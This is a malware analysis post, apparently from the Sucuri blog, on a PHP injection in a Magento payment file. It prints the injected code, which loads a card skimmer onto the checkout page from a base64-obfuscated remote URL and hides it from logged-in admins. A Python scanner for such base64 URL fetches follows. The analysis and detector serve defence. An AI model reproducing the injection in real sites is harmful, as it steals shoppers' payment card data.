Magento PHP Injection Loads JavaScript Skimmer


A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php


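// Only act on GET requests
if ($_SERVER["REQUEST_METHOD"] === "GET") {
    // ...whose URI is on the OneStepCheckout page
    if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false) {
        // ...and only when the "adminhtml" cookie is not set
        if (!isset($_COOKIE["adminhtml"])) {
            // Fetch the content at the base64-encoded URL and print it into the page
            echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
        }
    }
}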

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents, and the URL is obfuscated with base64.
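As an added example (not code from the original post or from Sucuri's tooling), the Python scanner below finds base64_decode() calls on string literals in PHP source, decodes them, and reports those that decode to a URL, noting whether the result is passed to a fetch function and echoed. The name scan_php, the regular expressions and the benign $label line in the sample are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Constructed sample: the injected block shown above, plus one benign base64_decode() call.
SAMPLE_PHP = r'''
if ($_SERVER["REQUEST_METHOD"] === "GET"){
  if (strpos($_SERVER["REQUEST_URI"], "/onestepcheckout/index/") !== false){
    if(!isset($_COOKIE["adminhtml"])){
      echo file_get_contents(base64_decode("aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM="));
    }
  }
}
$label = base64_decode("SGVsbG8gd29ybGQ=");  // constructed benign use
'''

# base64_decode() called directly on a quoted string literal
B64_CALL = re.compile(r'''base64_decode\s*\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)''')
# PHP constructs that load a resource when handed a URL, immediately before the call
FETCHERS = re.compile(r'(file_get_contents|fopen|curl_init|include|require)\s*\(?\s*$')
URL_LIKE = re.compile(r'^(https?:)?//', re.I)

def scan_php(source):
    """Return one finding per base64 literal that decodes to a URL."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in B64_CALL.finditer(line):
            try:
                raw = base64.b64decode(m.group(2), validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64, ignore
            decoded = raw.decode("utf-8", "replace")
            if not URL_LIKE.match(decoded):
                continue  # decodes to something other than a URL
            prefix = line[:m.start()]
            fetch = FETCHERS.search(prefix)
            findings.append({
                "line": lineno,
                "decoded": decoded,
                "fetched_by": fetch.group(1) if fetch else None,
                "echoed": bool(re.search(r'\b(echo|print)\b', prefix)),
            })
    return findings

if __name__ == "__main__":
    for finding in scan_php(SAMPLE_PHP):
        print(finding)
```

A finding with both fetched_by set and echoed true matches the pattern in the injected block: remote content printed straight into the checkout page.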

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.


